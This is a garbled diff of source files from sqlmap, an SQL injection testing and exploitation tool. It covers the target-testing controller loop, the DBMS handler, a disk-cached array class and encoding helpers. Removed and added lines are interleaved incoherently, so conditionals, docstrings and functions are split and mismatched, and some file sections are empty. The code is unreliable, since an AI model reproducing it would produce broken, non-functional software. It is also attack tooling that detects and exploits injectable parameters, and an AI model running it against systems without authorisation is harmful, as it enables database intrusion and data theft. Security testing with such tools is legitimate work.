                    message = "[#%d] form:\n%s %s" % (hostCount, conf.method, targetUrl)
                else:
                    message = "URL %d:\n%s %s%s" % (hostCount, HTTPMETHOD.GET, targetUrl, " (PageRank: %s)" % get_pagerank(targetUrl) if conf.googleDork and conf.pageRank else "")
                if conf.cookie:
                    message += "\nCookie: %s" % conf.cookie
-            if conf.data:
+                if conf.data is not None:
-                message += "\nPOST data: %s" % conf.data
+                    message += "\n%s data: %s" % ((conf.method if conf.method != HTTPMETHOD.GET else conf.method) or HTTPMETHOD.POST, urlencode(conf.data) if conf.data else "")
-            message += "\ndo you want to test this url? [Y/n/q] "
+                if conf.forms and conf.method:
                    if conf.method == HTTPMETHOD.GET and targetUrl.find("?") == -1:
                        continue
                    message += "\ndo you want to test this form? [Y/n/q] "
                    test = readInput(message, default="Y")
-            if not test:
+                    if not test or test[0] in ("y", "Y"):
-                pass
+                        if conf.method != HTTPMETHOD.GET:
                            message = "Edit %s data [default: %s]%s: " % (conf.method, urlencode(conf.data) if conf.data else "None", " (Warning: blank fields detected)" if conf.data and extractRegexResult(EMPTY_FORM_FIELDS_REGEX, conf.data) else "")
                            conf.data = readInput(message, default=conf.data)
                            conf.data = _randomFillBlankFields(conf.data)
                            conf.data = urldecode(conf.data) if conf.data and urlencode(DEFAULT_GET_POST_DELIMITER, None) not in conf.data else conf.data
                        else:
                            if targetUrl.find("?") > -1:
                                firstPart = targetUrl[:targetUrl.find("?")]
                                secondPart = targetUrl[targetUrl.find("?") + 1:]
                                message = "Edit GET data [default: %s]: " % secondPart
                                test = readInput(message, default=secondPart)
                                test = _randomFillBlankFields(test)
                                conf.url = "%s?%s" % (firstPart, test)
                        parseTargetUrl()
                    elif test[0] in ("n", "N"):
                        continue
                    elif test[0] in ("q", "Q"):
                        break
-            logMsg = "testing url %s" % targetUrl
+                else:
-            logger.info(logMsg)
+                    message += "\ndo you want to test this URL? [Y/n/q]"
        initTargetEnv()
        if not checkConnection() or not checkString() or not checkRegexp():
            continue
        for _, cookie in enumerate(conf.cj):
            cookie = str(cookie)
            index  = cookie.index(" for ")
            cookieStr += "%s;" % cookie[8:index]
        if cookieStr:
            cookieStr = cookieStr[:-1]
            if "Cookie" in conf.parameters:
                message  = "you provided an HTTP Cookie header value. "
                message += "The target url provided its own Cookie within "
                message += "the HTTP Set-Cookie header. Do you want to "
                message += "continue using the HTTP Cookie values that "
                message += "you provided? [Y/n] "
                    test = readInput(message, default="Y")
                    if not test or test[0] in ("y", "Y"):
-                    setCookieAsInjectable = False
+                        pass
-
+                    elif test[0] in ("n", "N"):
-            if setCookieAsInjectable:
+                        dataToStdout(os.linesep)
                conf.httpHeaders.append(("Cookie", cookieStr))
                conf.parameters["Cookie"] = cookieStr.replace("%", "%%")
                __paramDict = paramToDict("Cookie", cookieStr)
                if __paramDict:
                    conf.paramDict["Cookie"] = __paramDict
                    __testableParameters = True
        if not kb.injPlace or not kb.injParameter or not kb.injType:
            if not conf.string and not conf.regexp and not conf.eRegexp:
                if not checkStability():
                    errMsg  = "url is not stable, try with --string or "
                    errMsg += "--regexp options, refer to the user's manual "
                    errMsg += "paragraph 'Page comparison' for details"
                    if conf.multipleTargets:
                        errMsg += ", skipping to next url"
                        logger.warn(errMsg)
                        continue
-                    else:
+                    elif test[0] in ("q", "Q"):
-                        raise sqlmapConnectionException, errMsg
+                        break
-            for place in conf.parameters.keys():
+                    infoMsg = "testing URL '%s'" % targetUrl
-                if not conf.paramDict.has_key(place):
+                    logger.info(infoMsg)
            setupTargetEnv()
            if not checkConnection(suppressOutput=conf.forms) or not checkString() or not checkRegexp():
                continue
            checkWaf()
            if conf.identifyWaf:
                identifyWaf()
            if conf.nullConnection:
                checkNullConnection()
            if (len(kb.injections) == 0 or (len(kb.injections) == 1 and kb.injections[0].place is None)) \
                and (kb.injection.place is None or kb.injection.parameter is None):
                if not any((conf.string, conf.notString, conf.regexp)) and PAYLOAD.TECHNIQUE.BOOLEAN in conf.tech:
                    # NOTE: this is not needed anymore, leaving only to display
                    # a warning message to the user in case the page is not stable
                    checkStability()
                # Do a little prioritization reorder of a testable parameter list
                parameters = conf.parameters.keys()
                # Order of testing list (first to last)
                orderList = (PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER, PLACE.URI, PLACE.POST, PLACE.GET)
                for place in orderList[::-1]:
                    if place in parameters:
                        parameters.remove(place)
                        parameters.insert(0, place)
                proceed = True
                for place in parameters:
                    # Test User-Agent and Referer headers only if
                    # --level >= 3
                    skip = (place == PLACE.USER_AGENT and conf.level < 3)
                    skip |= (place == PLACE.REFERER and conf.level < 3)
                    # Test Host header only if
                    # --level >= 5
                    skip |= (place == PLACE.HOST and conf.level < 5)
                    # Test Cookie header only if --level >= 2
                    skip |= (place == PLACE.COOKIE and conf.level < 2)
                    skip |= (place == PLACE.USER_AGENT and intersect(USER_AGENT_ALIASES, conf.skip, True) not in ([], None))
                    skip |= (place == PLACE.REFERER and intersect(REFERER_ALIASES, conf.skip, True) not in ([], None))
                    skip |= (place == PLACE.COOKIE and intersect(PLACE.COOKIE, conf.skip, True) not in ([], None))
                    skip |= (place == PLACE.HOST and intersect(PLACE.HOST, conf.skip, True) not in ([], None))
                    skip &= not (place == PLACE.USER_AGENT and intersect(USER_AGENT_ALIASES, conf.testParameter, True))
                    skip &= not (place == PLACE.REFERER and intersect(REFERER_ALIASES, conf.testParameter, True))
                    skip &= not (place == PLACE.HOST and intersect(HOST_ALIASES, conf.testParameter, True))
                    skip &= not (place == PLACE.COOKIE and intersect((PLACE.COOKIE,), conf.testParameter, True))
                    if skip:
                        continue
                    if kb.testOnlyCustom and place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER):
                        continue
                    if place not in conf.paramDict:
                        continue
                    paramDict = conf.paramDict[place]
                    paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place
                    for parameter, value in paramDict.items():
-                    if not checkDynParam(place, parameter, value):
+                        if not proceed:
                        warnMsg = "%s parameter '%s' is not dynamic" % (place, parameter)
                        logger.warn(warnMsg)
                    else:
                        logMsg = "%s parameter '%s' is dynamic" % (place, parameter)
                        logger.info(logMsg)
                        for parenthesis in range(0, 4):
                            logMsg  = "testing sql injection on %s " % place
                            logMsg += "parameter '%s' with " % parameter
                            logMsg += "%d parenthesis" % parenthesis
                            logger.info(logMsg)
                            injType = checkSqlInjection(place, parameter, value, parenthesis)
                            if injType:
                                injData.append((place, parameter, injType))
                            break
-                            else:
+
-                                infoMsg  = "%s parameter '%s' is not " % (place, parameter)
+                        kb.vainRun = False
-                                infoMsg += "injectable with %d parenthesis" % parenthesis
+                        testSqlInj = True
                        paramKey = (conf.hostname, conf.path, place, parameter)
                        if paramKey in kb.testedParams:
                            testSqlInj = False
                            infoMsg = "skipping previously processed %s parameter '%s'" % (paramType, parameter)
                            logger.info(infoMsg)
-                        if not injData:
+                        elif parameter in conf.testParameter:
-                            warnMsg  = "%s parameter '%s' is not " % (place, parameter)
+                            pass
                        elif parameter == conf.rParam:
                            testSqlInj = False
                            infoMsg = "skipping randomizing %s parameter '%s'" % (paramType, parameter)
                            logger.info(infoMsg)
                        elif parameter in conf.skip or kb.postHint and parameter.split(' ')[-1] in conf.skip:
                            testSqlInj = False
                            infoMsg = "skipping %s parameter '%s'" % (paramType, parameter)
                            logger.info(infoMsg)
                        elif parameter == conf.csrfToken:
                            testSqlInj = False
                            infoMsg = "skipping anti-CSRF token parameter '%s'" % parameter
                            logger.info(infoMsg)
                        # Ignore session-like parameters for --level < 4
                        elif conf.level < 4 and (parameter.upper() in IGNORE_PARAMETERS or parameter.upper().startswith(GOOGLE_ANALYTICS_COOKIE_PREFIX)):
                            testSqlInj = False
                            infoMsg = "ignoring %s parameter '%s'" % (paramType, parameter)
                            logger.info(infoMsg)
                        elif PAYLOAD.TECHNIQUE.BOOLEAN in conf.tech or conf.skipStatic:
                            check = checkDynParam(place, parameter, value)
                            if not check:
                                warnMsg = "%s parameter '%s' does not appear dynamic" % (paramType, parameter)
                                logger.warn(warnMsg)
                                if conf.skipStatic:
                                    infoMsg = "skipping static %s parameter '%s'" % (paramType, parameter)
                                    logger.info(infoMsg)
                                    testSqlInj = False
                            else:
                                infoMsg = "%s parameter '%s' is dynamic" % (paramType, parameter)
                                logger.info(infoMsg)
                        kb.testedParams.add(paramKey)
                        if testSqlInj:
                            try:
                                if place == PLACE.COOKIE:
                                    pushValue(kb.mergeCookies)
                                    kb.mergeCookies = False
                                check = heuristicCheckSqlInjection(place, parameter)
                                if check != HEURISTIC_TEST.POSITIVE:
                                    if conf.smart or (kb.ignoreCasted and check == HEURISTIC_TEST.CASTED):
                                        infoMsg = "skipping %s parameter '%s'" % (paramType, parameter)
                                        logger.info(infoMsg)
                                        continue
                                infoMsg = "testing for SQL injection on %s " % paramType
                                infoMsg += "parameter '%s'" % parameter
                                logger.info(infoMsg)
                                injection = checkSqlInjection(place, parameter, value)
                                proceed = not kb.endDetection
                                injectable = False
                                if getattr(injection, "place", None) is not None:
                                    if NOTE.FALSE_POSITIVE_OR_UNEXPLOITABLE in injection.notes:
                                        kb.falsePositives.append(injection)
                                    else:
                                        injectable = True
                                        kb.injections.append(injection)
                                        # In case when user wants to end detection phase (Ctrl+C)
                                        if not proceed:
                                            break
                                        msg = "%s parameter '%s' " % (injection.place, injection.parameter)
                                        msg += "is vulnerable. Do you want to keep testing the others (if any)? [y/N] "
                                        test = readInput(msg, default="N")
                                        if test[0] not in ("y", "Y"):
                                            proceed = False
                                            paramKey = (conf.hostname, conf.path, None, None)
                                            kb.testedParams.add(paramKey)
                                if not injectable:
                                    warnMsg = "%s parameter '%s' is not " % (paramType, parameter)
                                    warnMsg += "injectable"
                                    logger.warn(warnMsg)
-        if not kb.injPlace or not kb.injParameter or not kb.injType:
+                            finally:
-            if len(injData) == 1:
+                                if place == PLACE.COOKIE:
-                injDataSelected = injData[0]
+                                    kb.mergeCookies = popValue()
            elif len(injData) > 1:
                injDataSelected = __selectInjection(injData)
            elif conf.multipleTargets:
                continue
            if len(kb.injections) == 0 or (len(kb.injections) == 1 and kb.injections[0].place is None):
                if kb.vainRun and not conf.multipleTargets:
                    errMsg = "no parameter(s) found for testing in the provided data "
                    errMsg += "(e.g. GET parameter 'id' in 'www.site.com/index.php?id=1')"
                    raise SqlmapNoneDataException(errMsg)
                else:
-                return
+                    errMsg = "all tested parameters appear to be not injectable."
-            if injDataSelected == "Quit":
+                    if conf.level < 5 or conf.risk < 3:
-                return
+                        errMsg += " Try to increase '--level'/'--risk' values "
                        errMsg += "to perform more tests."
                    if isinstance(conf.tech, list) and len(conf.tech) < 5:
                        errMsg += " Rerun without providing the option '--technique'."
                    if not conf.textOnly and kb.originalPage:
                        percent = (100.0 * len(getFilteredPageContent(kb.originalPage)) / len(kb.originalPage))
                        if kb.dynamicMarkings:
                            errMsg += " You can give it a go with the switch '--text-only' "
                            errMsg += "if the target page has a low percentage "
                            errMsg += "of textual content (~%.2f%% of " % percent
                            errMsg += "page content is text)."
                        elif percent < LOW_TEXT_PERCENT and not kb.errorIsNone:
                            errMsg += " Please retry with the switch '--text-only' "
                            errMsg += "(along with --technique=BU) as this case "
                            errMsg += "looks like a perfect candidate "
                            errMsg += "(low textual content along with inability "
                            errMsg += "of comparison engine to detect at least "
                            errMsg += "one dynamic parameter)."
                    if kb.heuristicTest == HEURISTIC_TEST.POSITIVE:
                        errMsg += " As heuristic test turned out positive you are "
                        errMsg += "strongly advised to continue on with the tests. "
                        errMsg += "Please, consider usage of tampering scripts as "
                        errMsg += "your target might filter the queries."
                    if not conf.string and not conf.notString and not conf.regexp:
                        errMsg += " Also, you can try to rerun by providing "
                        errMsg += "either a valid value for option '--string' "
                        errMsg += "(or '--regexp')."
                    elif conf.string:
                        errMsg += " Also, you can try to rerun by providing a "
                        errMsg += "valid value for option '--string' as perhaps the string you "
                        errMsg += "have chosen does not match "
                        errMsg += "exclusively True responses."
                    elif conf.regexp:
                        errMsg += " Also, you can try to rerun by providing a "
                        errMsg += "valid value for option '--regexp' as perhaps the regular "
                        errMsg += "expression that you have chosen "
                        errMsg += "does not match exclusively True responses."
                    if not conf.tamper:
                        errMsg += " If you suspect that there is some kind of protection mechanism "
                        errMsg += "involved (e.g. WAF) maybe you could retry "
                        errMsg += "with an option '--tamper' (e.g. '--tamper=space2comment')"
                    raise SqlmapNotVulnerableException(errMsg.rstrip('.'))
            else:
-                kb.injPlace, kb.injParameter, kb.injType = injDataSelected
+                # Flush the flag
-                setInjection()
+                kb.testMode = False
-        if not conf.multipleTargets and ( not kb.injPlace or not kb.injParameter or not kb.injType ):
+                _saveToResultsFile()
-            raise sqlmapNotVulnerableException, "all parameters are not injectable"
+                _saveToHashDB()
-        elif kb.injPlace and kb.injParameter and kb.injType:
+                _showInjections()
-            condition = False
+                _selectInjection()
            if kb.injection.place is not None and kb.injection.parameter is not None:
                if conf.multipleTargets:
                    message = "do you want to exploit this SQL injection? [Y/n] "
                    exploit = readInput(message, default="Y")
-                if not exploit or exploit[0] in ("y", "Y"):
+                    condition = not exploit or exploit[0] in ("y", "Y")
                    condition = True
                else:
                    condition = True
                if condition:
                checkForParenthesis()
                createTargetDirs()
                    action()
-    if conf.loggedToOut:
+        except KeyboardInterrupt:
-        logger.info("Fetched data logged to text files under '%s'" % conf.outputPath)
+            if conf.multipleTargets:
                warnMsg = "user aborted in multiple target mode"
                logger.warn(warnMsg)
                message = "do you want to skip to the next target in list? [Y/n/q]"
                test = readInput(message, default="Y")
                if not test or test[0] in ("y", "Y"):
                    pass
                elif test[0] in ("n", "N"):
                    return False
                elif test[0] in ("q", "Q"):
                    raise SqlmapUserQuitException
            else:
                raise
        except SqlmapUserQuitException:
            raise
        except SqlmapSilentQuitException:
            raise
        except SqlmapBaseException, ex:
            errMsg = getSafeExString(ex)
            if conf.multipleTargets:
                _saveToResultsFile()
                errMsg += ", skipping to the next %s" % ("form" if conf.forms else "URL")
                logger.error(errMsg)
            else:
                logger.critical(errMsg)
                return False
        finally:
            showHttpErrorCodes()
            if kb.maxConnectionsFlag:
                warnMsg = "it appears that the target "
                warnMsg += "has a maximum connections "
                warnMsg += "constraint"
                logger.warn(warnMsg)
    if kb.dataOutputFlag and not conf.multipleTargets:
        logger.info("fetched data logged to text files under '%s'" % conf.outputPath)
    if conf.multipleTargets:
        if conf.resultsFilename:
            infoMsg = "you can find results of scanning in multiple targets "
            infoMsg += "mode inside the CSV file '%s'" % conf.resultsFilename
            logger.info(infoMsg)
    return True
--- a/lib/controller/handler.py
+++ b/lib/controller/handler.py
@@ -1,42 +1,51 @@
 #!/usr/bin/env python
 """
-$Id$
+Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
-
+See the file 'doc/COPYING' for copying permission
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
                        and Daniele Bellucci <daniele.bellucci@gmail.com>
 sqlmap is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
 Software Foundation version 2 of the License.
 sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
 WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
 FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
 details.
 You should have received a copy of the GNU General Public License along
 with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
-
+from lib.core.common import Backend
 from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger
 from lib.core.dicts import DBMS_DICT
 from lib.core.enums import DBMS
 from lib.core.settings import MSSQL_ALIASES
 from lib.core.settings import MYSQL_ALIASES
 from lib.core.settings import ORACLE_ALIASES
 from lib.core.settings import PGSQL_ALIASES
 from lib.core.settings import SQLITE_ALIASES
 from lib.core.settings import ACCESS_ALIASES
 from lib.core.settings import FIREBIRD_ALIASES
 from lib.core.settings import MAXDB_ALIASES
 from lib.core.settings import SYBASE_ALIASES
 from lib.core.settings import DB2_ALIASES
 from lib.core.settings import HSQLDB_ALIASES
 from lib.utils.sqlalchemy import SQLAlchemy
 from plugins.dbms.mssqlserver import MSSQLServerMap
 from plugins.dbms.mssqlserver.connector import Connector as MSSQLServerConn
 from plugins.dbms.mysql import MySQLMap
 from plugins.dbms.mysql.connector import Connector as MySQLConn
 from plugins.dbms.oracle import OracleMap
 from plugins.dbms.oracle.connector import Connector as OracleConn
 from plugins.dbms.postgresql import PostgreSQLMap
-
+from plugins.dbms.postgresql.connector import Connector as PostgreSQLConn
 from plugins.dbms.sqlite import SQLiteMap
 from plugins.dbms.sqlite.connector import Connector as SQLiteConn
 from plugins.dbms.access import AccessMap
 from plugins.dbms.access.connector import Connector as AccessConn
 from plugins.dbms.firebird import FirebirdMap
 from plugins.dbms.firebird.connector import Connector as FirebirdConn
 from plugins.dbms.maxdb import MaxDBMap
 from plugins.dbms.maxdb.connector import Connector as MaxDBConn
 from plugins.dbms.sybase import SybaseMap
 from plugins.dbms.sybase.connector import Connector as SybaseConn
 from plugins.dbms.db2 import DB2Map
 from plugins.dbms.db2.connector import Connector as DB2Conn
 from plugins.dbms.hsqldb import HSQLDBMap
 from plugins.dbms.hsqldb.connector import Connector as HSQLDBConn
 def setHandler():
    """
@@ -44,28 +53,63 @@ def setHandler():
    management system.
    """
-    count     = 0
+    items = [
-    dbmsNames = ( "MySQL", "Oracle", "PostgreSQL", "Microsoft SQL Server" )
+                  (DBMS.MYSQL, MYSQL_ALIASES, MySQLMap, MySQLConn),
-    dbmsMap   = (
+                  (DBMS.ORACLE, ORACLE_ALIASES, OracleMap, OracleConn),
-                  ( MYSQL_ALIASES, MySQLMap ),
+                  (DBMS.PGSQL, PGSQL_ALIASES, PostgreSQLMap, PostgreSQLConn),
-                  ( ORACLE_ALIASES, OracleMap ),
+                  (DBMS.MSSQL, MSSQL_ALIASES, MSSQLServerMap, MSSQLServerConn),
-                  ( PGSQL_ALIASES, PostgreSQLMap ),
+                  (DBMS.SQLITE, SQLITE_ALIASES, SQLiteMap, SQLiteConn),
-                  ( MSSQL_ALIASES, MSSQLServerMap ),
+                  (DBMS.ACCESS, ACCESS_ALIASES, AccessMap, AccessConn),
-                )
+                  (DBMS.FIREBIRD, FIREBIRD_ALIASES, FirebirdMap, FirebirdConn),
                  (DBMS.MAXDB, MAXDB_ALIASES, MaxDBMap, MaxDBConn),
                  (DBMS.SYBASE, SYBASE_ALIASES, SybaseMap, SybaseConn),
                  (DBMS.DB2, DB2_ALIASES, DB2Map, DB2Conn),
                  (DBMS.HSQLDB, HSQLDB_ALIASES, HSQLDBMap, HSQLDBConn),
            ]
-    for dbmsAliases, dbmsEntry in dbmsMap:
+    _ = max(_ if (Backend.getIdentifiedDbms() or "").lower() in _[1] else None for _ in items)
-        if conf.dbms and conf.dbms not in dbmsAliases:
+    if _:
-            debugMsg  = "skipping test for %s" % dbmsNames[count]
+        items.remove(_)
        items.insert(0, _)
    for dbms, aliases, Handler, Connector in items:
        if conf.dbms and conf.dbms.lower() != dbms and conf.dbms.lower() not in aliases:
            debugMsg = "skipping test for %s" % dbms
            logger.debug(debugMsg)
            count += 1
            continue
-        dbmsHandler = dbmsEntry()
+        handler = Handler()
        conf.dbmsConnector = Connector()
-        if dbmsHandler.checkDbms():
+        if conf.direct:
-            if not conf.dbms or conf.dbms in dbmsAliases:
+            logger.debug("forcing timeout to 10 seconds")
-                kb.dbmsDetected = True
+            conf.timeout = 10
-                return dbmsHandler
+            dialect = DBMS_DICT[dbms][3]
-    return None
+            if dialect:
                sqlalchemy = SQLAlchemy(dialect=dialect)
                sqlalchemy.connect()
                if sqlalchemy.connector:
                    conf.dbmsConnector = sqlalchemy
                else:
                    try:
                        conf.dbmsConnector.connect()
                    except NameError:
                        pass
            else:
                conf.dbmsConnector.connect()
        if handler.checkDbms():
            if kb.resolutionDbms:
                conf.dbmsHandler = max(_ for _ in items if _[0] == kb.resolutionDbms)[2]()
            else:
                conf.dbmsHandler = handler
            break
        else:
            conf.dbmsConnector = None
    # At this point back-end DBMS is correctly fingerprinted, no need
    # to enforce it anymore
    Backend.flushForcedDbms()
--- a/lib/core/init.py
+++ b/lib/core/init.py
@@ -1,25 +1,8 @@
 #!/usr/bin/env python
 """
-$Id$
+Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
-
+See the file 'doc/COPYING' for copying permission
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
                        and Daniele Bellucci <daniele.bellucci@gmail.com>
 sqlmap is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
 Software Foundation version 2 of the License.
 sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
 WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
 FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
 details.
 You should have received a copy of the GNU General Public License along
 with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 pass
--- a/lib/core/agent.py
+++ b/lib/core/agent.py
--- a/lib/core/bigarray.py
+++ b/lib/core/bigarray.py
@@ -0,0 +1,168 @@
 #!/usr/bin/env python
 """
 Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 try:
   import cPickle as pickle
 except:
   import pickle
 import itertools
 import os
 import sys
 import tempfile
 from lib.core.enums import MKSTEMP_PREFIX
 from lib.core.exception import SqlmapSystemException
 from lib.core.settings import BIGARRAY_CHUNK_SIZE
 DEFAULT_SIZE_OF = sys.getsizeof(object())
 def _size_of(object_):
    """
    Returns total size of a given object_ (in bytes)
    """
    retval = sys.getsizeof(object_, DEFAULT_SIZE_OF)
    if isinstance(object_, dict):
        retval += sum(_size_of(_) for _ in itertools.chain.from_iterable(object_.items()))
    elif hasattr(object_, "__iter__"):
        retval += sum(_size_of(_) for _ in object_)
    return retval
 class Cache(object):
    """
    Auxiliary class used for storing cached chunks
    """
    def __init__(self, index, data, dirty):
        self.index = index
        self.data = data
        self.dirty = dirty
 class BigArray(list):
    """
    List-like class used for storing large amounts of data (disk cached)
    """
    def __init__(self):
        self.chunks = [[]]
        self.chunk_length = sys.maxint
        self.cache = None
        self.filenames = set()
        self._os_remove = os.remove
        self._size_counter = 0
    def append(self, value):
        self.chunks[-1].append(value)
        if self.chunk_length == sys.maxint:
            self._size_counter += _size_of(value)
            if self._size_counter >= BIGARRAY_CHUNK_SIZE:
                self.chunk_length = len(self.chunks[-1])
                self._size_counter = None
        if len(self.chunks[-1]) >= self.chunk_length:
            filename = self._dump(self.chunks[-1])
            self.chunks[-1] = filename
            self.chunks.append([])
    def extend(self, value):
        for _ in value:
            self.append(_)
    def pop(self):
        if len(self.chunks[-1]) < 1:
            self.chunks.pop()
            try:
                with open(self.chunks[-1], "rb") as fp:
                    self.chunks[-1] = pickle.load(fp)
            except IOError, ex:
                errMsg = "exception occurred while retrieving data "
                errMsg += "from a temporary file ('%s')" % ex.message
                raise SqlmapSystemException, errMsg
        return self.chunks[-1].pop()
    def index(self, value):
        for index in xrange(len(self)):
            if self[index] == value:
                return index
        return ValueError, "%s is not in list" % value
    def _dump(self, chunk):
        try:
            handle, filename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.BIG_ARRAY)
            self.filenames.add(filename)
            os.close(handle)
            with open(filename, "w+b") as fp:
                pickle.dump(chunk, fp, pickle.HIGHEST_PROTOCOL)
            return filename
        except (OSError, IOError), ex:
            errMsg = "exception occurred while storing data "
            errMsg += "to a temporary file ('%s'). Please " % ex.message
            errMsg += "make sure that there is enough disk space left. If problem persists, "
            errMsg += "try to set environment variable 'TEMP' to a location "
            errMsg += "writeable by the current user"
            raise SqlmapSystemException, errMsg
    def _checkcache(self, index):
        if (self.cache and self.cache.index != index and self.cache.dirty):
            filename = self._dump(self.cache.data)
            self.chunks[self.cache.index] = filename
        if not (self.cache and self.cache.index == index):
            try:
                with open(self.chunks[index], "rb") as fp:
                    self.cache = Cache(index, pickle.load(fp), False)
            except IOError, ex:
                errMsg = "exception occurred while retrieving data "
                errMsg += "from a temporary file ('%s')" % ex.message
                raise SqlmapSystemException, errMsg
    def __getstate__(self):
        return self.chunks, self.filenames
    def __setstate__(self, state):
        self.__init__()
        self.chunks, self.filenames = state
    def __getslice__(self, i, j):
        retval = BigArray()
        i = max(0, len(self) + i if i < 0 else i)
        j = min(len(self), len(self) + j if j < 0 else j)
        for _ in xrange(i, j):
            retval.append(self[_])
        return retval
    def __getitem__(self, y):
        if y < 0:
            y += len(self)
        index = y / self.chunk_length
        offset = y % self.chunk_length
        chunk = self.chunks[index]
        if isinstance(chunk, list):
            return chunk[offset]
        else:
            self._checkcache(index)
            return self.cache.data[offset]
    def __setitem__(self, y, value):
        index = y / self.chunk_length
        offset = y % self.chunk_length
        chunk = self.chunks[index]
        if isinstance(chunk, list):
            chunk[offset] = value
        else:
            self._checkcache(index)
            self.cache.data[offset] = value
            self.cache.dirty = True
    def __repr__(self):
        return "%s%s" % ("..." if len(self.chunks) > 1 else "", self.chunks[-1].__repr__())
    def __iter__(self):
        for i in xrange(len(self)):
            yield self[i]
    def __len__(self):
        return len(self.chunks[-1]) if len(self.chunks) == 1 else (len(self.chunks) - 1) * self.chunk_length + len(self.chunks[-1])
--- a/lib/core/common.py
+++ b/lib/core/common.py
--- a/lib/core/convert.py
+++ b/lib/core/convert.py
@@ -1,86 +1,219 @@
 #!/usr/bin/env python
 """
-$Id$
+Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
-
+See the file 'doc/COPYING' for copying permission
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
                        and Daniele Bellucci <daniele.bellucci@gmail.com>
 sqlmap is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
 Software Foundation version 2 of the License.
 sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
 WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
 FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
 details.
 You should have received a copy of the GNU General Public License along
 with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 import base64
 import json
 import pickle
 import re
 import StringIO
 import sys
 from lib.core.settings import IS_WIN
 from lib.core.settings import UNICODE_ENCODING
 from lib.core.settings import PICKLE_REDUCE_WHITELIST
-import md5
+def base64decode(value):
-import sha
+    """
-import struct
+    Decodes string value from Base64 to plain format
 import urllib
    >>> base64decode('Zm9vYmFy')
    'foobar'
    """
-def base64decode(string):
+    return base64.b64decode(value)
    return string.decode("base64")
 def base64encode(value):
    """
    Encodes string value from plain to Base64 format
-def base64encode(string):
+    >>> base64encode('foobar')
-    return string.encode("base64")[:-1]
+    'Zm9vYmFy'
    """
    return base64.b64encode(value)
-def hexdecode(string):
+def base64pickle(value):
-    string = string.lower()
+    """
    Serializes (with pickle) and encodes to Base64 format supplied (binary) value
-    if string.startswith("0x"):
+    >>> base64pickle('foobar')
-        string = string[2:]
+    'gAJVBmZvb2JhcnEALg=='
    """
-    return string.decode("hex")
+    retVal = None
    try:
        retVal = base64encode(pickle.dumps(value, pickle.HIGHEST_PROTOCOL))
    except:
        warnMsg = "problem occurred while serializing "
        warnMsg += "instance of a type '%s'" % type(value)
        singleTimeWarnMessage(warnMsg)
-def hexencode(string):
+        try:
-    return string.encode("hex")
+            retVal = base64encode(pickle.dumps(value))
        except:
            retVal = base64encode(pickle.dumps(str(value), pickle.HIGHEST_PROTOCOL))
    return retVal
-def md5hash(string):
+def base64unpickle(value):
-    return md5.new(string).hexdigest()
+    """
    Decodes value from Base64 to plain format and deserializes (with pickle) its content
    >>> base64unpickle('gAJVBmZvb2JhcnEALg==')
    'foobar'
    """
-def orddecode(string):
+    retVal = None
    packedString = struct.pack("!"+"I" * len(string), *string)
    return "".join([chr(char) for char in struct.unpack("!"+"I"*(len(packedString)/4), packedString)])
    def _(self):
        if len(self.stack) > 1:
            func = self.stack[-2]
            if func not in PICKLE_REDUCE_WHITELIST:
                raise Exception, "abusing reduce() is bad, Mkay!"
        self.load_reduce()
-def ordencode(string):
+    def loads(str):
-    return tuple([ord(char) for char in string])
+        file = StringIO.StringIO(str)
        unpickler = pickle.Unpickler(file)
        unpickler.dispatch[pickle.REDUCE] = _
        return unpickler.load()
    try:
        retVal = loads(base64decode(value))
    except TypeError: 
        retVal = loads(base64decode(bytes(value)))
-def sha1hash(string):
+    return retVal
    return sha.new(string).hexdigest()
 def hexdecode(value):
    """
    Decodes string value from hex to plain format
-def urldecode(string):
+    >>> hexdecode('666f6f626172')
-    if not string:
+    'foobar'
-        return
+    """
-    doublePercFreeString = string.replace("%%", "__DPERC__")
+    value = value.lower()
-    unquotedString = urllib.unquote_plus(doublePercFreeString)
+    return (value[2:] if value.startswith("0x") else value).decode("hex")
    unquotedString = unquotedString.replace("__DPERC__", "%%")
-    return unquotedString
+def hexencode(value):
    """
    Encodes string value from plain to hex format
    >>> hexencode('foobar')
    '666f6f626172'
    """
-def urlencode(string, safe=":/?%&="):
+    return utf8encode(value).encode("hex")
    if not string:
        return
-    return urllib.quote(string, safe)
+def unicodeencode(value, encoding=None):
    """
    Returns 8-bit string representation of the supplied unicode value
    >>> unicodeencode(u'foobar')
    'foobar'
    """
    retVal = value
    if isinstance(value, unicode):
        try:
            retVal = value.encode(encoding or UNICODE_ENCODING)
        except UnicodeEncodeError:
